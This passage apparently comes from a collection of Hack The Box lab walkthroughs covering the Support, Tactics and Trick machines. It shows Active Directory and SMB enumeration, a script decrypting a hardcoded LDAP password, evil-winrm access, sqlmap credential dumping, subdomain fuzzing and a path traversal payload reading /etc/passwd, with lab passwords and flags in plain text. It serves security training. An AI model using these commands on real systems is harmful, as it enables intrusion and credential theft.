                        • Domain: support.htb (reported as support.htb0. in the LDAP banner).

                        ","tags":["walkthrough"]},{"location":"htb-support/#enumerate","title":"Enumerate","text":"

                        Now, we can perform some basic enumeration to gather data about the target.

                        enum4linux 10.10.11.174\n

                        Among the lines in the results, you can see these interesting lines:

                        =========================================( Target Information )=========================================\nKnown Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none\n\n ===================================( Session Check on 10.10.11.174 )===================================    \n[+] Server 10.10.11.174 allows sessions using username '', password ''\n\n================================( Getting domain SID for 10.10.11.174 )================================             \nDomain Name: SUPPORT                                                                     \nDomain Sid: S-1-5-21-1677581083-3380853377-188903654\n

                        Using the tool kerbrute, we will enumerate valid usernames in the Active Directory:

                        (kali\u327fkali)-[~/tools/kerbrute/dist]\n\u2514\u2500$ ./kerbrute_linux_amd64 userenum -d support --dc 10.10.11.174 /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt\n

                        Results:

                            __             __               __     \n   / /_____  _____/ /_  _______  __/ /____\n  / //_/ _ \\/ ___/ __ \\/ ___/ / / / __/ _ \\\n / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/\n/_/|_|\\___/_/  /_.___/_/   \\__,_/\\__/\\___/                                        \n\nVersion: dev (9cfb81e) - 11/09/22 - Ronnie Flathers @ropnop\n\n2022/11/09 05:16:54 >  Using KDC(s):\n2022/11/09 05:16:54 >   10.10.11.174:88\n\n2022/11/09 05:16:56 >  [+] VALID USERNAME:  support@support\n2022/11/09 05:16:57 >  [+] VALID USERNAME:  guest@support\n2022/11/09 05:17:03 >  [+] VALID USERNAME:  administrator@support\n2022/11/09 05:17:52 >  [+] VALID USERNAME:  Guest@support\n2022/11/09 05:17:53 >  [+] VALID USERNAME:  Administrator@support\n2022/11/09 05:19:42 >  [+] VALID USERNAME:  management@support\n2022/11/09 05:19:59 >  [+] VALID USERNAME:  Support@support\n2022/11/09 05:20:52 >  [+] VALID USERNAME:  GUEST@support\n2022/11/09 05:31:02 >  [+] VALID USERNAME:  SUPPORT@support\n

                        What we did with kerbrute could also have been done with dnsrecon.

                        The SMB service is open, so we can try to enumerate the shares provided by the host:

                        # -L looks at what services are available on a target and -N forces the tool not to ask for a password\nsmbclient -L //$ip -N\n

                        Results:

                                Sharename       Type      Comment\n        ---------       ----      -------\n        ADMIN$          Disk      Remote Admin\n        C$              Disk      Default share\n        IPC$            IPC       Remote IPC\n        NETLOGON        Disk      Logon server share\n        support-tools   Disk      support staff tools\n        SYSVOL          Disk      Logon server share\nReconnecting with SMB1 for workgroup listing.\ndo_connect: Connection to 10.10.11.174 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)\nUnable to connect with SMB1 -- no workgroup available\n
                        ","tags":["walkthrough"]},{"location":"htb-support/#initial-access","title":"Initial access","text":"

                        After trying to connect to ADMIN$, C$, we connect to the share \"support-tools\":

                        smbclient //10.10.11.174/support-tools\n

                        This way, we obtain an SMB command prompt (smb: \\>). Typing help at that prompt shows which commands you can execute.

                        Also, we list the content in the folder:

                        dir\n

                        Results:

                        smb: \\> dir\n  .                                   D        0  Wed Jul 20 13:01:06 2022\n  ..                                  D        0  Sat May 28 07:18:25 2022\n  7-ZipPortable_21.07.paf.exe         A  2880728  Sat May 28 07:19:19 2022\n  npp.8.4.1.portable.x64.zip          A  5439245  Sat May 28 07:19:55 2022\n  putty.exe                           A  1273576  Sat May 28 07:20:06 2022\n  SysinternalsSuite.zip               A 48102161  Sat May 28 07:19:31 2022\n  UserInfo.exe.zip                    A   277499  Wed Jul 20 13:01:07 2022\n  windirstat1_1_2_setup.exe           A    79171  Sat May 28 07:20:17 2022\n  WiresharkPortable64_3.6.5.paf.exe      A 44398000  Sat May 28 07:19:43 2022\n\n                4026367 blocks of size 4096. 968945 blocks available\n

                        We also check permissions on the share and learn that we only have read access. Now we are going to retrieve all these files to inspect them closely. Among the commands you can execute is mget. So we run:

                        mget *\n
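                        If smbclient asks for confirmation on every file, the prompt command toggles per-file prompting off first:

                        smb: \\> prompt\nsmb: \\> mget *\n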

                        This will download all the files to the local folder from which you initiated your Samba connection. Close the connection:

                        quit\n

                        Now, have a close look at the files we have downloaded. Unzip UserInfo.exe.zip file:

                        unzip UserInfo.exe.zip\n

                        After unzipping UserInfo.exe.zip, you have two files: UserInfo.exe and UserInfo.exe.config. Run:

                        cat UserInfo.exe.config\n

                        Result:

                        <?xml version=\"1.0\" encoding=\"utf-8\"?>\n<configuration>\n    <startup>\n        <supportedRuntime version=\"v4.0\" sku=\".NETFramework,Version=v4.8\" />\n    </startup>\n  <runtime>\n    <assemblyBinding xmlns=\"urn:schemas-microsoft-com:asm.v1\">\n      <dependentAssembly>\n        <assemblyIdentity name=\"System.Runtime.CompilerServices.Unsafe\" publicKeyToken=\"b03f5f7f11d50a3a\" culture=\"neutral\" />\n        <bindingRedirect oldVersion=\"0.0.0.0-6.0.0.0\" newVersion=\"6.0.0.0\" />\n      </dependentAssembly>\n    </assemblyBinding>\n  </runtime>\n</configuration>\n

                        From this, we know that UserInfo.exe is a binary built for the .NET Framework. Basically, this executable appears to be used to pull user information, likely from Active Directory. If we want to go further in our inspection, we will need a .NET decompiler for Linux. Here we have several options.

                        Since it's open source and we are using a Kali virtual machine to perform this penetration test, let's use ILSpy, but you can have a look at alternative tools at the end of this walkthrough. To run ILSpy, you need to install it first. It also has some dependencies, like the .NET 6.0 SDK, Avalonia, dotnet... Install what you are asked to and, when done, run:

                        cd ~/tools/AvaloniaILSpy/artifacts/linux-x64\n./ILSpy\n

                        Open UserInfo.exe in the program and inspect the code. There are several parts in the code:

                        • References
                        • {}
                        • {} UserInfo
                        • {} UserInfo.Commands
                        • {} UserInfo.Services

                        In UserInfo.Services you can find LdapQuery():

                        using System.DirectoryServices;\n\npublic LdapQuery()\n{\n    //IL_0018: Unknown result type (might be due to invalid IL or missing references)\n    //IL_0022: Expected O, but got Unknown\n    //IL_0035: Unknown result type (might be due to invalid IL or missing references)\n    //IL_003f: Expected O, but got Unknown\n    string password = Protected.getPassword();\n    entry = new DirectoryEntry(\"LDAP://support.htb\", \"support\\\\ldap\", password);\n    entry.set_AuthenticationType((AuthenticationTypes)1);\n    ds = new DirectorySearcher(entry);\n}\n

                        From here, we can see that the LdapQuery() function is used to log in to the Active Directory as the user \"support\\ldap\". For the password, it calls the getPassword() function. Let's click on that function in the code to see it:

                        public static string getPassword()\n{\n    byte[] array = Convert.FromBase64String(enc_password);\n    byte[] array2 = array;\n    for (int i = 0; i < array.Length; i++)\n    {\n        array2[i] = (byte)((uint)(array[i] ^ key[i % key.Length]) ^ 0xDFu);\n    }\n    return Encoding.Default.GetString(array2);\n}\n

                        Here we can see the steps we will need to reverse in order to recover the password. Now, let's look at two members: the string \"enc_password\" and the private byte array \"key\".

                        // enc_password field\n// UserInfo.Services.Protected\nusing System.Text;\n\nprivate static string enc_password = \"0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E\"\n
                        // private static byte[] key\n// UserInfo.Services.Protected\nusing System.Text;\n\nprivate static byte[] key = Encoding.ASCII.GetBytes(\"armando\");\n

                        With these two last elements, we can write a script to reverse the function getPassword() and ultimately obtain the password used for \"support\" user to access the Active Directory.

                        Save the script as script.py with this content:

                        import base64\n\nenc_password = \"0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E\"\nkey = b'armando'\n\narray = base64.b64decode(enc_password)\narray2 = ''\nfor i in range(len(array)):\n    array2 += chr(array[i] ^ key[i%len(key)] ^ 223)\n\nprint(array2)\n

                        Now, give script.py execution permissions and run it:

                        chmod +x script.py\npython script.py\n

                        The decrypted password is: nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz

                        Before going on, note that there is another way to get the password besides writing this Python script. For instance, it would involve:

                        1. Opening a Windows machine in the tun0 network range.
                        2. Opening Wireshark and capturing on the tun0 interface.
                        3. Running the executable UserInfo.exe from the Windows machine.
                        4. Examining the LDAP authentication packet in Wireshark (Follow TCP Stream on a request to port 389); see the tshark sketch below.
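                        Equivalently, from the CLI, a hedged tshark sketch of step 4 (the interface name and filters are assumptions):

                        # capture LDAP traffic on the VPN interface and print packet details\ntshark -i tun0 -f \"tcp port 389\" -Y \"ldap\" -V\n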

                        Summing up, we have:

                        • user: support
                        • password: nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz
                        • ldap directory: support.htb

                        Now we can use a tool such as ldapsearch to open a connection to the LDAP server, bind, and perform a search using specified parameters, like:

                        -b searchbase   Use searchbase as the starting point for the search instead of the default.\n-x      Use simple authentication instead of SASL.\n-D binddn   Use the Distinguished Name binddn to bind to the LDAP directory.  For SASL binds, the server is expected to ignore this value.\n-w passwd       Use passwd as the password for simple authentication.\n-H ldapuri  Specify  URI(s)  referring  to  the  ldap  server(s); a list of URI, separated by whitespace or commas is expected\n

                        Using ldapsearch, we run:

                        # ldapsearch -x -H ldap://$ip -D '<DOMAIN>\\<username>' -w '<password>' -b \"CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>\"\n\nldapsearch -x -H ldap://support.htb -D 'support\\ldap' -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b \"CN=Users,DC=support,DC=htb\"\n

                        Results are long and provided in text form. By using a tool such as ldapdomaindump we can get cool results in different formats: .grep, .html, and .json.

                         ldapdomaindump -u 'support\\ldap' -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' dc.support.htb\n

                        Then, we can run:

                        firefox domain_users.html\n

                        Results:

                        It looks like the support user account has the most permissions. We take a closer look at this user in the results obtained from ldapsearch:

                        # support, Users, support.htb\ndn: CN=support,CN=Users,DC=support,DC=htb\nobjectClass: top\nobjectClass: person\nobjectClass: organizationalPerson\nobjectClass: user\ncn: support\nc: US\nl: Chapel Hill\nst: NC\npostalCode: 27514\ndistinguishedName: CN=support,CN=Users,DC=support,DC=htb\ninstanceType: 4\nwhenCreated: 20220528111200.0Z\nwhenChanged: 20221109173336.0Z\nuSNCreated: 12617\ninfo: Ironside47pleasure40Watchful\nmemberOf: CN=Shared Support Accounts,CN=Users,DC=support,DC=htb\nmemberOf: CN=Remote Management Users,CN=Builtin,DC=support,DC=htb\nuSNChanged: 81981\ncompany: support\nstreetAddress: Skipper Bowles Dr\nname: support\nobjectGUID:: CqM5MfoxMEWepIBTs5an8Q==\nuserAccountControl: 66048\nbadPwdCount: 0\ncodePage: 0\ncountryCode: 0\nbadPasswordTime: 0\nlastLogoff: 0\nlastLogon: 0\npwdLastSet: 132982099209777070\nprimaryGroupID: 513\nobjectSid:: AQUAAAAAAAUVAAAAG9v9Y4G6g8nmcEILUQQAAA==\naccountExpires: 9223372036854775807\nlogonCount: 0\nsAMAccountName: support\nsAMAccountType: 805306368\nobjectCategory: CN=Person,CN=Schema,CN=Configuration,DC=support,DC=htb\ndSCorePropagationData: 20220528111201.0Z\ndSCorePropagationData: 16010101000000.0Z\nlastLogonTimestamp: 133124888166969633\n

                        There! Usually the \"info\" field is left empty, but in this case you can read \"Ironside47pleasure40Watchful\", which might be a credential. Assuming that it is, we are going to use it to get a remote session on the target. For that, there exists a tool called evil-winrm.

                        What does evil-winrm do? evil-winrm is a WinRM shell for hacking/pentesting purposes.

                        And what is WinRM? WinRM (Windows Remote Management) is the Microsoft implementation of the WS-Management Protocol, a standard SOAP-based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their operating systems to make life easier for system administrators. Download the evil-winrm repo here.

                        Run:

                        evil-winrm -i dc.support.htb -u support -p \"Ironside47pleasure40Watchful\"\n

                        And we will connect to a PowerShell session: PS C:\\Users\\support\\Documents

                        To get the user.txt flag, run:

                        cd ..\ndir\ncd Desktop\ndir\ntype user.txt\n

                        Result:

                        561ec390613a0f53b431d3e14e923de6\n
                        ","tags":["walkthrough"]},{"location":"htb-support/#getting-the-systems-flag","title":"Getting the System's flag","text":"

                        Coming soon.

                        ","tags":["walkthrough"]},{"location":"htb-support/#tools-in-this-lab","title":"Tools in this lab","text":"

                        Before going through this write-up, you may want to have a look at the tools needed to solve it, in case you prefer to investigate them and try harder instead of reading the solution directly.

                        kerbrute

                        Created by ropnop. Download repo. A tool to quickly bruteforce and enumerate valid Active Directory accounts through Kerberos Pre-Authentication.

                        Nicely done in Go, so to install it you first need to make sure that Go is installed. If it isn't, run:

                        sudo apt update && sudo apt install golang\n

                        Then, follow the instructions from the repo.

                        enum4linux

                        Preinstalled on a Kali machine. A tool to exploit null sessions using some Perl scripts. Some useful commands:

                        # enumerates shares\nenum4linux -S $ip\n\n# enumerates users\nenum4linux -U $ip\n\n# enumerates machine list\nenum4linux -M $ip\n\n# displays the password policy in case you need to mount a network authentication attack\nenum4linux -enuP $ip\n\n# specify username to use (default \"\")\nenum4linux -u $ip\n\n# specify password to use (default \"\")\nenum4linux -p $ip\n\n# you can also brute force share names by adding a file\nenum4linux -s /usr/share/enum4linux/share-list.txt $ip\n

                        dnspy

                        Created by a bunch of contributors. Download the repo. dnSpy is a debugger and .NET assembly editor. You can use it to edit and debug assemblies even if you don't have any source code available. There is a catch: this tool is Windows-only.

                        To install it, open PowerShell on Windows and run:

                        git clone --recursive https://github.com/dnSpy/dnSpy.git\ncd dnSpy\n./build.ps1 -NoMsbuild\n

                        ILSpy

                        An open source alternative to dnSpy. Download it from the ILSpy repo. To install ILSpy, you need some dependencies, like the .NET 6.0 SDK, Avalonia, dotnet... Install what you are asked to and, when done, run:

                        cd ~/tools/AvaloniaILSpy/artifacts/linux-x64\n./ILSpy\n
                        ","tags":["walkthrough"]},{"location":"htb-support/#what-i-learned","title":"What I learned","text":"

                        When doing the Support machine I was faced with some challenging missions:

                        Enumerating shares as part of a Null session attack.

                        A null session attack exploits an authentication vulnerability in Windows Administrative Shares. It lets an attacker connect to a local or remote share without authentication and, therefore, enumerate precious info such as passwords, system users, system groups, running system processes... The challenge here was to choose the best-suited tools to perform this enumeration. In my mental repo, I had:

                        • Samba suite
                        • Enum4linux

                        But there are also nmap scripts for SMB enumeration.

                        Finding a .NET decompiler for Linux

                        There are well-known decompilers out there. For Windows you have dnSpy and many more. On Linux you have the open source ILSpy. BUT: installation requires some dependencies. There are other options as well (e.g. Wine).

                        LDAP enumeration tools

                        ldap-utils comes preinstalled on Kali, but before this lab I hadn't had the chance to try it out.

                        ldapsearch

                        Syntax:

                        ldapsearch -x -H ldap://$ip -D '<DOMAIN>\\<username>' -w '<password>' -b \"CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>\"\n

                        An example:

                        ldapsearch -x -H ldap://dc.support.htb -D 'SUPPORT\\ldap' -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b \"CN=Users,DC=SUPPORT,DC=HTB\" | tee ldap_dc.support.htb.txt\n

                        ldapdomaindump

                        I have enjoyed this tool for real! It's pretty straightforward and you get legible results. An example of how to run it:

                        ldapdomaindump -u 'support\\ldap' -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' dc.support.htb\n
                        ","tags":["walkthrough"]},{"location":"htb-tactics/","title":"Tactics - A HackTheBox machine","text":"
                        nmap -sC -A 10.129.228.98  -Pn -p-\n

                        Results:

                        PORT    STATE SERVICE       VERSION\n135/tcp open  msrpc         Microsoft Windows RPC\n139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn\n445/tcp open  microsoft-ds?\nService Info: OS: Windows; CPE: cpe:/o:microsoft:windows\n\nHost script results:\n|_clock-skew: -5s\n| p2p-conficker: \n|   Checking for Conficker.C or higher...\n|   Check 1 (port 7476/tcp): CLEAN (Timeout)\n|   Check 2 (port 63095/tcp): CLEAN (Timeout)\n|   Check 3 (port 16465/udp): CLEAN (Timeout)\n|   Check 4 (port 43695/udp): CLEAN (Timeout)\n|_  0/4 checks are positive: Host is CLEAN or ports are blocked\n| smb2-security-mode: \n|   311: \n|_    Message signing enabled but not required\n| smb2-time: \n|   date: 2023-05-02T10:26:04\n|_  start_date: N/A\n

                        The interesting part here is:

                        smb2-security-mode: \n|   311: \n|_    Message signing enabled but not required\n

                        This will allow us to use smbclient share enumeration without needing to provide a password when signing in to the shared folder. For that, we will use a well-known Windows user: Administrator.

                        smbclient -L 10.129.228.98 -U Administrator\n

                        Results:

                                Sharename       Type      Comment\n        ---------       ----      -------\n        ADMIN$          Disk      Remote Admin\n        C$              Disk      Default share\n        IPC$            IPC       Remote IPC\n
                        smbclient \\\\\\\\10.129.228.98\\\\C$ -U Administrator\n

                        The flag is located at:

                        \\Users\\Administrator\\Desktop\\flag.txt\n
                        ","tags":["walkthrough","windows","smb","port 445"]},{"location":"htb-trick/","title":"Walkthrough - Trick, a Hack The Box machine","text":"","tags":["walkthrough"]},{"location":"htb-trick/#about-the-machine","title":"About the machine","text":"data Machine Trick Platform Hackthebox url link creator Geiseric OS Linux Release data 18 June 2022 Difficulty Easy Points 20 ip 10.10.11.166","tags":["walkthrough"]},{"location":"htb-trick/#recon","title":"Recon","text":"

                        First, we run:

                        export ip=10.10.11.166\n
                        ","tags":["walkthrough"]},{"location":"htb-trick/#service-port-enumeration","title":"Service/ Port enumeration","text":"

                        Run nmap to enumerate open ports, services, OS, and traceroute.

                        A general scan first, so as not to make too much noise:

                        sudo nmap $ip -Pn\n

                        Results:

                        Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-19 13:31 EDT\nNmap scan report for trick.htb (10.10.11.166)\nHost is up (0.15s latency).\nNot shown: 996 closed tcp ports (reset)\nPORT   STATE SERVICE\n22/tcp open  ssh\n25/tcp open  smtp\n53/tcp open  domain\n80/tcp open  http\n

                        Once you know open ports, run nmap to see service versions and more details:

                        nmap -sCV -p22,80,53,25 -oN targeted $ip\n

                        Results:

                        PORT   STATE SERVICE VERSION\n22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)\n| ssh-hostkey:\n|   2048 61:ff:29:3b:36:bd:9d:ac:fb:de:1f:56:88:4c:ae:2d (RSA)\n|   256 9e:cd:f2:40:61:96:ea:21:a6:ce:26:02:af:75:9a:78 (ECDSA)\n|_  256 72:93:f9:11:58:de:34:ad:12:b5:4b:4a:73:64:b9:70 (ED25519)\n25/tcp open  smtp    Postfix smtpd\n|_smtp-commands: debian.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING\n53/tcp open  domain  ISC BIND 9.11.5-P4-5.1+deb10u7 (Debian Linux)\n| dns-nsid:\n|_  bind.version: 9.11.5-P4-5.1+deb10u7-Debian\n80/tcp open  http    nginx 1.14.2\n|_http-title: Coming Soon - Start Bootstrap Theme\n|_http-server-header: nginx/1.14.2\nService Info: Host:  debian.localdomain; OS: Linux; CPE: cpe:/o:linux:linux_kernel\n
                        ","tags":["walkthrough"]},{"location":"htb-trick/#directory-enumeration","title":"Directory enumeration","text":"

                        We can use gobuster to enumerate directories:

                        gobuster dir -u $ip -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt\n
                        ","tags":["walkthrough"]},{"location":"htb-trick/#dns-enumeration","title":"dns enumeration","text":"

                        Run:

                        nslookup\n

                        And after that:

                        > SERVER 10.10.11.166\n

                        Results:

                        Default server: 10.10.11.166\nAddress: 10.10.11.166#53\n

                        Then, we run:

                        > 10.10.11.166\n

                        And as a result, we have:

                        166.11.10.10.in-addr.arpa       name = trick.htb.\n

                        Now we have a DNS name: trick.htb. We can attempt a zone transfer with dig:

                        dig trick.htb axfr @10.10.11.166\n

                        And the results:

                        ; <<>> DiG 9.18.6-2-Debian <<>> trick.htb axfr @10.10.11.166\n;; global options: +cmd\ntrick.htb.              604800  IN      SOA     trick.htb. root.trick.htb. 5 604800 86400 2419200 604800\ntrick.htb.              604800  IN      NS      trick.htb.\ntrick.htb.              604800  IN      A       127.0.0.1\ntrick.htb.              604800  IN      AAAA    ::1\npreprod-payroll.trick.htb. 604800 IN    CNAME   trick.htb.\ntrick.htb.              604800  IN      SOA     trick.htb. root.trick.htb. 5 604800 86400 2419200 604800\n;; Query time: 96 msec\n;; SERVER: 10.10.11.166#53(10.10.11.166) (TCP)\n;; WHEN: Wed Oct 19 13:20:24 EDT 2022\n;; XFR size: 6 records (messages 1, bytes 231)\n

                        Finally, we have these DNS names:

                        • trick.htb
                        • preprod-payroll.trick.htb
                        • root.trick.htb

                        ","tags":["walkthrough"]},{"location":"htb-trick/#edit-etchosts-file","title":"Edit /etc/hosts file","text":"

                        We add the given subdomains to our /etc/hosts file. First we open /etc/hosts with an editor, for instance nano.

                        sudo nano /etc/hosts\n
                        We move the cursor to the end and we add these lines:

                        10.10.11.166    trick.htb\n10.10.11.166    preprod-payroll.trick.htb\n10.10.11.166    root.trick.htb\n

                        Now we can use the browser to go to: http://preprod-payroll.trick.htb

                        And start again with directory enumeration.

                        ","tags":["walkthrough"]},{"location":"htb-trick/#directory-enumeration_1","title":"Directory enumeration","text":"

                        Run the dictionary:

                        gobuster dir -u http://preprod-payroll.trick.htb -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt\n

                        Results:

                        Dirs found with a 302 response:\n\n/\n\nDirs found with a 403 response:\n\n/assets/\n/database/\n/assets/vendor/\n/assets/img/\n/assets/vendor/jquery/\n/assets/DataTables/\n/assets/vendor/bootstrap/\n/assets/vendor/bootstrap/js/\n/assets/vendor/jquery.easing/\n/assets/css/\n/assets/vendor/php-email-form/\n/assets/vendor/venobox/\n/assets/vendor/waypoints/\n/assets/vendor/counterup/\n/assets/vendor/owl.carousel/\n/assets/vendor/bootstrap-datepicker/\n/assets/vendor/bootstrap-datepicker/js/\n/assets/js/\n/assets/font-awesome/\n/assets/font-awesome/js/\n/assets/vendor/owl.carousel/assets/\n/assets/vendor/bootstrap/css/\n/assets/vendor/bootstrap-datepicker/css/\n/assets/font-awesome/css/\n/assets/vendor/bootstrap-datepicker/locales/\n/assets/font-awesome/less/\n\n\n--------------------------------\nFiles found during testing:\n\nFiles found with a 302 responce:\n\n/index.php\n\nFiles found with a 200 responce:\n\n/login.php\n/home.php\n/header.php\n/users.php\n/ajax.php\n/navbar.php\n/assets/vendor/jquery/jquery.min.js\n/assets/DataTables/datatables.min.js\n/assets/vendor/bootstrap/js/bootstrap.bundle.min.js\n/assets/vendor/jquery.easing/jquery.easing.min.js\n/assets/vendor/php-email-form/validate.js\n/assets/vendor/venobox/venobox.min.js\n/assets/vendor/waypoints/jquery.waypoints.min.js\n/assets/vendor/counterup/counterup.min.js\n/assets/vendor/owl.carousel/owl.carousel.min.js\n/assets/js/select2.min.js\n/assets/vendor/bootstrap-datepicker/js/bootstrap-datepicker.min.js\n/assets/js/jquery.datetimepicker.full.min.js\n/assets/js/jquery-te-1.4.0.min.js\n/assets/font-awesome/js/all.min.js\n/department.php\n/topbar.php\n/position.php\n/employee.php\n/payroll.php\n

                        In http://preprod-payroll.trick.htb/users.php there is this info:

                        name: Administrator\nusername: Enemigosss\n
                        ","tags":["walkthrough"]},{"location":"htb-trick/#exploiting-a-sql-injection-vulnerability","title":"Exploiting a sql injection vulnerability","text":"

                        If we have a look at the login form at http://preprod-payroll.trick.htb/login.php and run sqlmap on it, we'll see that it is vulnerable to blind SQL injection.
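                        The -r flag used below reads a raw HTTP request saved to a file named login; a hedged sketch of its contents (headers abbreviated, form field names are assumptions):

                        POST /login.php HTTP/1.1\nHost: preprod-payroll.trick.htb\nContent-Type: application/x-www-form-urlencoded\n\nusername=lele&password=lalala\n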

                        We can extract databases:

                        sqlmap -r login --dbs\n

                        Results:

                        available databases [2]:\n[*] information_schema\n[*] payroll_db\n

                        Now, we extract tables from payroll_db database:

                        sqlmap -r login -D payroll_db --tables\n

                        Results:

                        Database: payroll_db\n[11 tables]\n+---------------------+\n| position            |\n| allowances          |\n| attendance          |\n| deductions          |\n| department          |\n| employee            |\n| employee_allowances |\n| employee_deductions |\n| payroll             |\n| payroll_items       |\n| users               |\n+---------------------+\n

                        Next, we get columns from the users table:

                        sqlmap -r login -D payroll_db -T users --columns\n

                        Results:

                        Database: payroll_db\nTable: users\n[8 columns]\n+-----------+--------------+\n| Column    | Type         |\n+-----------+--------------+\n| address   | text         |\n| contact   | text         |\n| doctor_id | int(30)      |\n| id        | int(30)      |\n| name      | varchar(200) |\n| password  | varchar(200) |\n| type      | tinyint(1)   |\n| username  | varchar(100) |\n+-----------+--------------+\n

                        And finally we can get usernames and passwords:

                        sqlmap -r login -D payroll_db -T users -C username,password --dump\n

                        Results:

                        Database: payroll_db\nTable: users\n[1 entry]\n+------------+-----------------------+\n| username   | password              |\n+------------+-----------------------+\n| Enemigosss | SuperGucciRainbowCake |\n+------------+-----------------------+\n

                        We can log in at http://preprod-payroll.trick.htb and see an administration panel, but other than information disclosure, we cannot find a vulnerability to get into the server.

                        ","tags":["walkthrough"]},{"location":"htb-trick/#dns-fuzzing","title":"DNS fuzzing","text":"

                        Since the subdomain name (http://preprod-payroll.trick.htb/) looks interesting, as \u201cpayroll\u201d could be replaced with another word, we can consider fuzzing it. First, we need to figure out the response size of a query for a non-existent subdomain. Then we fuzz for subdomains.

                        curl -s -H \"Host: nonexistent.trick.htb\" https://trick.htb | wc -c\n

It returns 5480, which is the size filter that we will use in the ffuf command.

Now we can enumerate subdomains with ffuf:

ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000-trick.txt -u http://trick.htb -H \"Host: FUZZ.trick.htb\" -fs 5480\n

Adding -fs 5480 to the command filters out responses that are 5480 bytes in length (the non-existent subdomains), so we can pinpoint real findings.

                        ffuf -H \"Host: preprod-FUZZ.trick.htb\" -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -u http://10.10.11.166 -fs 5480\n

                        Adding the filter reveals a new subdomain called preprod-marketing. Results:

                                /'___\\  /'___\\           /'___\\       \n       /\\ \\__/ /\\ \\__/  __  __  /\\ \\__/       \n       \\ \\ ,__\\\\ \\ ,__\\/\\ \\/\\ \\ \\ \\ ,__\\      \n        \\ \\ \\_/ \\ \\ \\_/\\ \\ \\_\\ \\ \\ \\ \\_/      \n         \\ \\_\\   \\ \\_\\  \\ \\____/  \\ \\_\\       \n          \\/_/    \\/_/   \\/___/    \\/_/       \n\n       v1.5.0 Kali Exclusive <3\n________________________________________________\n\n :: Method           : GET\n :: URL              : http://10.10.11.166\n :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt\n :: Header           : Host: preprod-FUZZ.trick.htb\n :: Follow redirects : false\n :: Calibration      : false\n :: Timeout          : 10\n :: Threads          : 40\n :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500\n :: Filter           : Response size: 5480\n________________________________________________\n\nmarketing               [Status: 200, Size: 9660, Words: 3007, Lines: 179, Duration: 267ms]\npc169                   [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 212ms]\npayroll                 [Status: 302, Size: 9546, Words: 1453, Lines: 267, Duration: 116ms]\n77msccom                [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 183ms\n
                        ","tags":["walkthrough"]},{"location":"htb-trick/#edit-etchosts-file_1","title":"Edit /etc/hosts file","text":"

We add the discovered subdomain to our /etc/hosts file. First, we open /etc/hosts with an editor, for instance nano.

                        sudo nano /etc/hosts\n

We move the cursor to the end and add this line:

                        10.10.11.166    preprod-marketing.trick.htb\n
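Equivalently, a non-interactive sketch appending the same entry (sudo tee is used because /etc/hosts is root-owned):

echo \"10.10.11.166    preprod-marketing.trick.htb\" | sudo tee -a /etc/hosts\n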

We enter the address in the browser and see a website. One of the pages is vulnerable to path traversal; the ..././ payload below defeats a filter that strips ../ non-recursively, since removing the inner ../ from ..././ leaves ../ behind:

                        http://preprod-marketing.trick.htb/index.php?page=..././..././..././..././..././etc/passwd\n

                        Results:

                        root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\nsync:x:4:65534:sync:/bin:/bin/sync\ngames:x:5:60:games:/usr/games:/usr/sbin/nologin\nman:x:6:12:man:/var/cache/man:/usr/sbin/nologin\nlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\nmail:x:8:8:mail:/var/mail:/usr/sbin/nologin\nnews:x:9:9:news:/var/spool/news:/usr/sbin/nologin\nuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\nproxy:x:13:13:proxy:/bin:/usr/sbin/nologin\nwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\nbackup:x:34:34:backup:/var/backups:/usr/sbin/nologin\nlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin\nirc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin\nnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\n_apt:x:100:65534::/nonexistent:/usr/sbin/nologin\nsystemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin\nsystemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin\nsystemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin\nmessagebus:x:104:110::/nonexistent:/usr/sbin/nologin\ntss:x:105:111:TPM2 software stack,,,:/var/lib/tpm:/bin/false\ndnsmasq:x:106:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin\nusbmux:x:107:46:usbmux 